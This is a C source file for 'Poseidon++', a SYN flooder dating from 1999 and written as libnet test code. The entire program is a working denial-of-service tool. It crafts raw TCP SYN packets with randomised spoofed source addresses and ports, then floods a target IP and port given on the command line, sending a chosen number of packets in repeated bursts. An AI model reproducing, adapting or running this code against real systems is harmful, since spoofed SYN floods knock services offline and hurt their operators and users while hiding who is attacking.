/*
 *  $Id: p.c,v 1.3 1999/01/31 21:05:41 route Exp $
 *
 *  Poseidon++ (c) 1996, 1997, 1998, 1999 daemon9|route <route@infonexus.com>
 *  SYN flooder rewritten for no good reason.  Again for libnet testcode.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <time.h>
#include "../../include/libnet.h"

void usage(u_char *);

struct t_pack
{
    struct ip ip;
    struct tcphdr tcp;
};


int
main(int argc, char **argv)
{
    u_long dst_ip   = 0;
    u_long src_ip   = 0;
    u_short dst_prt = 0;
    u_short src_prt = 0;
    u_char *cp, *buf;
    int i, c, packet_amt, burst_int, sockfd, burst_amt;

    packet_amt  = 0;
    burst_int   = 0;
    burst_amt   = 1;

    while((c = getopt(argc, argv, "t:a:i:b:")) != EOF)
    {
        switch (c)
        {
            /*
             *  We expect the input to be of the form `ip.ip.ip.ip.port`.  We
             *  point cp to the last dot of the IP address/port string and
             *  then seperate them with a NULL byte.  The optarg now points to
             *  just the IP address, and cp points to the port.
             */
            case 't':
                if (!(cp = strrchr(optarg, '.'))) usage(argv[0]);
                *cp++ = 0;
                dst_prt = (u_short)atoi(cp);
                if (!(dst_ip = name_resolve(optarg, 1)))
                {
                    fprintf(stderr, "Bad IP address: %s\n", optarg);
                    exit(1);
                }
                break;

            case 'a':
                packet_amt  = atoi(optarg);
                break;

            case 'i':
                burst_int   = atoi(optarg);
                break;

            case 'b':
                burst_amt   = atoi(optarg);
                break;

            default:
                usage(argv[0]);
        }
    }

    if (!dst_prt || !dst_ip || !packet_amt) usage(argv[0]);

    if ((sockfd = open_raw_sock(IPPROTO_RAW)) == -1)
    {
        perror("socket allocation");
        exit(1);
    }

    buf = malloc(TCP_H + IP_H);
    if (!buf)
    {
        perror("No memory for packet header");
        exit(1);
    }
    memset(buf, 0, TCP_H + IP_H);

    seed_prand();

    for(; burst_amt--;)
    {
        for (i = 0; i < packet_amt; i++)
        {
            build_ip(TCP_H,
                    0,
                    get_prand(PRu16),
                    0,
                    get_prand(PR8),
                    IPPROTO_TCP,
                    src_ip = get_prand(PRu32),
                    dst_ip,
                    NULL,
                    0,
                    buf);

            build_tcp(src_prt = get_prand(PRu16),
                    dst_prt,
                    get_prand(PRu32),
                    get_prand(PRu32),
                    TH_SYN,
                    get_prand(PRu16),
                    0,
                    NULL,
                    0,
                    buf + IP_H);

            do_checksum(buf, IPPROTO_TCP, TCP_H);

            c = write_ip(sockfd, buf, TCP_H + IP_H);
            if (c < TCP_H + IP_H)
            {
                fprintf(stderr, "write_ip\n");
            }
            usleep(250);
            printf("%15s:%5d ------> %15s:%5d\n", 
                    host_lookup(src_ip, 1),
                    ntohs(src_prt),
                    host_lookup(dst_ip, 1),
                    dst_prt);
        }
        sleep(burst_int);
    }
    free(buf);
    exit(0);
}


void
usage(u_char *nomenclature)
{
    fprintf(stderr,
        "\n\nusage: %s -t -a [-i -b]\n"
        "\t-t target, (ip.address.port: 192.168.2.6.23)\n"
        "\t-a number of packets to send per burst\n"
        "\t-i packet burst sending interval (defaults to 0)\n"
        "\t-b number packet bursts to send (defaults to 1)\n" , nomenclature);

    exit(0);
}


/* EOF */
